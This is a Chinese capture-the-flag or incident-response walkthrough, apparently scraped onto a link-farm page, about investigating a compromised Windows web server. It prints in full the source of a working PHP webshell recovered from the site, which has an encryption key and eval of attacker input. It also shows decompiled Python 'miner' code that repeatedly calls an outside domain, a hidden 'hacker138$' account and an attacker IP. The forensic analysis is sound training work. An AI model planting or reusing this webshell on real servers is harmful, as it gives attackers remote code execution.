当前位置: 首页 > news >正文

网站信息备案管理系统企业信息网查询系统

网站信息备案管理系统,企业信息网查询系统,wordpress地址更改,网站公司怎么找客户rdp连接 1.通过本地 PC RDP到服务器并且找到黑客植入 shell,将黑客植入 shell 的密码 作为 FLAG 提交; 找到目录 然后全部文件爬下来放到d盾里面扫描 然后扫到了一个后门文件 <?php error_reporting(0); session_start();$key"e45e329feb5d925b"; //该密钥为连接…

rdp连接

1.通过本地 PC RDP到服务器并且找到黑客植入 shell,将黑客植入 shell 的密码 作为 FLAG 提交;

找到目录

然后全部文件爬下来放到d盾里面扫描

然后扫到了一个后门文件

<?php
@error_reporting(0);
session_start();$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond$_SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15]; }}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);
?>

2.通过本地 PC RDP到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交;

我们找到小皮里面的关于阿帕奇的日志记录路径

然后搜索 shell.php

然后猜测192.168.126.1是其中黑客尝试爆破的一个ip

flag{192.168.126.1}

3.通过本地 PC RDP到服务器并且分析黑客的隐藏账户名称,将黑客隐藏账户名称作为 FLAG 提交;

隐藏账户一般是影子账户,所以直接命令秒了

C:\Users\Administrator>wmic useraccount get Name
Name
Administrator
DefaultAccount
Guest
hacker138$
WDAGUtilityAccount

提交的时候要删去$

flag{hacker138}

4.通过本地 PC RDP到服务器并且分析黑客的挖矿程序的矿池域名,将黑客挖矿程序的矿池域名称作为(仅域名)FLAG 提交;

进入该账户内进行查看是否有相关的信息

发现有一个应用程序,看起来很大还是py打包的,而且中文名为矿

直接开始解包

然后得到pyc源码

用uncompyle6进行反编译pyc源码

import multiprocessing, requestsdef cpu_intensive_task():while True:try:requests.get('http://wakuang.zhigongshanfang.top', timeout=10)except:passif __name__ == '__main__':cpu_count = multiprocessing.cpu_count()processes = [multiprocessing.Process(target=cpu_intensive_task) for _ in range(cpu_count)]for process in processes:process.start()else:for process in processes:process.join()

显而易见 其中的矿池地址是

http://wakuang.zhigongshanfang.top

前面的域名也显而易见是挖矿

flag{wakuang.zhigongshanfang.top}

http://www.dtcms.com/a/522852.html

相关文章:

  • 企业网站管理系统用户裁剪图网站
  • 一个网站建设需要多少人力江苏九天建设有限公司网站
  • 优秀的网站设计图片手机app免费制作
  • 网页视频制作杭州百度人工优化
  • 网站建设公司税负率平面设计多久能学会
  • 宝安网站制作培训wordpress设置404
  • 东营网站app建设周杰伦做的广告网站
  • 做财经比较好的网站有哪些网站建设找谁
  • 档案网站开发小程序wordpress
  • 珠海做网站报价开发一块地需要多少钱
  • 拱墅区哪里有网站建设北京网站建设公司哪些好
  • 建设企业网站费用滑县网站建设公司
  • 网站开发前端课程品牌网站的愿望清单怎么做
  • 网站模板设计开发上海医院网站建设
  • 临汾网站建设价格镇江市住房和城乡建设局网站
  • 网站管理员怎么登陆网站文章伪原创怎么做
  • 建设公寓租房信息网站阿里指数怎么没有了
  • 做直播网站软件有哪些软件网站用橙色
  • 贵州省建设厅报名网站小程序开发平台哪个品牌好
  • 上海高端网站建设服建企业网站怎么做
  • 威县做网站多少钱河北沧州最新消息
  • 住房和城乡建设部网站杂志步骤一
  • 关于做网站的ppt广东网站建设网
  • 湖州童装网站网站开发和微信开发需要什么人
  • 如何上传网站到凡科网西安微信网站建设公司
  • 秦皇岛建设局网站6山西省网站建设制作
  • 正规的网站制作服务商如何做网站进行推广
  • 做网站 属于电子商务济南简单的网站制作
  • 网站开发页面福州公司网站建设
  • 高端品牌网站建设公司哪家好wordpress 作者插件